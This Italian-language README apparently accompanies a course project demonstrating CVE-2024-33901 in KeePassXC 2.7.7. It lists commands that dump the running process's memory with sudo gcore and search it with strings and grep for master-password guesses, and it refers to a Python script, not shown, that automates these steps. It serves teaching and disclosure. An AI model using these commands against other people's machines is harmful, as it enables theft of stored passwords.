
Breve programma che dimostra la vulnerabilità CVE-2024-33901 in KeePassXC versione 2.7.7
Breve programma che dimostra la vulnerabilità CVE-2024-33901 in KeePassXC versione 2.7.7
La relazione per il corso potrebbe richiedere il collegamento al codice sorgente, perciò ho creato la repository per questo
Questo può essere ottenuto recuperando il PID, cosa che può essere fatta con questo comando:
ps aux | grep keepassxc
E poi eseguendo questo comando: sudo gcore -o keepassxc_dump PID_HERE
Ad esempio, se il PID che hai ottenuto era 1234, il comando dovrebbe essere:
sudo gcore -o keepassxc_dump 1234
3. Infine, puoi eseguire questo comando: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
Quindi se il PID era 1234, il comando sarebbe:
cat keepassxc_dump.1234 | strings | grep "password guess here"
Una volta creato il file di dump della memoria, l'attacco può essere eseguito anche se il database viene bloccato di nuovo o se KeePassXC viene chiuso.
Il codice Python fornito esegue tutti questi passaggi e tenta più ipotesi di password basate sui file di testo forniti.